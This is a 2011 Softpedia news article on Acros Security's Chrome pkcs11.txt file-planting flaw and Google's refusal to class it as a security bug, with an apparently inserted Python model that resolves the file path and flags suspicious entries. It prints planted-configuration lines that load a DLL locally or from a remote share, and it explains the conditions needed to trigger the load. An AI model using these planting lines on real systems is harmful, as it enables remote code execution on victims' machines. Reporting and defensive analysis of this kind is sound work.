Softpedia
October 21st, 2011, 14:43 GMT · By Eduard Kovacs

Google Chrome Exposed to 'pkcs11.txt' File Planting

Image caption: Google: Chrome is not vulnerable to file planting
Security researchers at Acros Security discovered a flaw in Google Chrome for Windows that, under certain conditions, makes the browser load an attacker-supplied data file and, through it, an arbitrary DLL, leading to the execution of arbitrary code.

According to Acros, with a little social engineering their proof-of-concept could be used by an attacker to take over a system.

The attack hinges on Chrome reading a data file called pkcs11.txt, the configuration file its crypto library consults to find PKCS#11 modules. If the file's library variable is set to a value such as library=c:\\temp\malicious.dll, Chrome loads malicious.dll as if it were a cryptographic module, and the DLL's code runs inside the browser.

The library path can also point to a remote shared folder, for example library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib, so the attacker's DLL does not even have to be on the victim's disk.

Because the library is loaded by the main browser process, chrome.exe, rather than by a sandboxed renderer, Chrome's sandbox does nothing to contain it: the planted code runs with the user's full privileges, which is what makes this a real issue.

So why did Google not respond with a fix, given that it had been notified of the problem a month earlier?

The answer is simple: too many conditions have to line up for the attack to work, and too much social engineering is needed to arrange them.

First, Google must not be set as the browser's default search engine. With Google as the default, Chrome sends HTTPS requests as soon as it starts, which initializes the crypto library and reads pkcs11.txt before the attacker has any influence over where it is read from; other search engines do not trigger HTTPS requests at launch.

The attack also requires that no HTTPS request has yet been made in that browser session, because the file is read only when the crypto library first initializes. If the user has already visited any HTTPS site, the file has already been read from a harmless location and the whole operation fails.

The name Chrome actually opens is “/pkcs11.txt”: a rooted path with no drive letter, which Windows resolves against the root of the drive, or network share, that the process's current working directory is on. The attacker therefore has to gain control of Chrome's working directory, and place the file at the root of that location, to successfully launch the attack.

“If the attacker could get the user to try to load a file from her network shared folder, and trigger the first HTTPS request while the user had this folder opened in the 'Open' dialog, Chrome would load pkcs11.txt from the root of attacker's network share and load the library specified in it,” the researchers explain.
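To make the path-resolution step concrete, here is an added Python model of the chain described above; it is not Acros's proof-of-concept and not Chrome code. It resolves the drive-relative name "/pkcs11.txt" against a working directory the way Win32 does (Python's ntpath applies the Windows rules on any host), extracts library= values with a deliberately simplified parser (an assumption made here; NSS's real module-spec syntax is richer), and flags entries that would load code from a UNC share or from a relative location. The file contents and the in-memory "filesystem" are constructed for the example; the share path is the one quoted in the article.

```python
"""Model of the pkcs11.txt planting chain (added example, not Chrome or Acros code)."""
import ntpath
import re

# The name the article says Chrome's crypto library opens on its first HTTPS
# use. It is rooted but has no drive letter, so Win32 resolves it against the
# root of whatever drive or \\server\share the current working directory is on.
PKCS11_NAME = "/pkcs11.txt"

# library=<value> tokens in a pkcs11.txt line, quoted or bare. Simplified
# grammar assumed for this example; NSS's real module-spec syntax is richer.
_LIBRARY_RE = re.compile(r'library=(?:"([^"]*)"|(\S+))')


def resolve_drive_relative(cwd, rooted_name):
    """Resolve a rooted, drive-less path like Win32: keep cwd's drive letter
    (or UNC server-share prefix) and throw away cwd's directory part.
    ntpath implements these rules on any host, so this runs on Linux too."""
    return ntpath.normpath(ntpath.join(cwd, rooted_name))


def classify_library(path):
    """Where a library= value would be loaded from:
    'unc'      - a remote share, code fetched over the network
    'absolute' - an explicit local drive letter
    'relative' - no drive, so resolved against the process's current directory
                 (or its drive root): attacker-influenceable"""
    drive, _ = ntpath.splitdrive(path)
    if drive.startswith(("\\\\", "//")):
        return "unc"
    if drive:
        return "absolute"
    return "relative"


def parse_libraries(text):
    """Return every library= value in pkcs11.txt contents, skipping # comments."""
    libs = []
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        for quoted, bare in _LIBRARY_RE.findall(line):
            libs.append(quoted or bare)
    return libs


def first_https_load(cwd, files):
    """Model the first-HTTPS-request step: open PKCS11_NAME relative to cwd's
    root and return (resolved path, libraries that would be loaded).
    `files` maps lower-cased Windows paths to contents (NTFS and SMB names are
    case-insensitive); a missing file yields no libraries."""
    path = resolve_drive_relative(cwd, PKCS11_NAME)
    text = files.get(path.lower())
    return path, (parse_libraries(text) if text is not None else [])


def audit(libraries):
    """(library, class, suspicious) for each entry. Anything that is not an
    explicit local path is flagged, which is the check a loader should make
    before handing a module path to LoadLibrary."""
    return [(lib, classify_library(lib), classify_library(lib) != "absolute")
            for lib in libraries]


# Constructed file contents: the share path is the one quoted in the article.
PLANTED_PKCS11 = (
    "# constructed sample of a planted pkcs11.txt\n"
    r"library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib name=planted"
    "\n"
)

# Constructed in-memory filesystem: the victim's C: root has no pkcs11.txt,
# the attacker's share root does.
FILES = {
    r"\\www.binaryplanting.com\demo\pkcs11.txt".lower(): PLANTED_PKCS11,
}


if __name__ == "__main__":
    for cwd in (r"C:\Users\victim\Documents",
                r"\\www.binaryplanting.com\demo\chrome_pkcs11Planting"):
        path, libs = first_https_load(cwd, FILES)
        print("cwd=%s -> reads %s -> libraries %s" % (cwd, path, libs))
        for lib, kind, bad in audit(libs):
            print("   %-9s %s %s" % (kind, "SUSPICIOUS" if bad else "ok", lib))
```

Run stand-alone, the model shows the two outcomes the article describes: with the working directory under C:\ the browser looks for C:\pkcs11.txt and finds nothing, while with the Open dialog sitting in a folder on the attacker's share it reads \\www.binaryplanting.com\demo\pkcs11.txt and comes back with a UNC library path that the audit flags. The same classify-and-flag step is what a defensive loader would apply to every library= entry before loading anything.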

Given how many conditions have to hold for such an attack to work, Google decided not to treat the matter as a security bug.

“Strange behavior, but we're not treating this as a security bug. The preconditions to exploit this are too stretched: non-default browser configuration, freshly started browser, ability to get someone to load a file from your share.”

They consider that “the social engineering level involved here is significantly higher than 'Your computer is infected with a virus, download this free anti-virus software and run the exe file to fix it.'”

Whatever Google's view, the Acros Security Research Lab team believes that any behavior that can lead to remote code execution on a device should be treated as a vulnerability.

Copyright © 2001-2012 Softpedia. Contact/Tip us at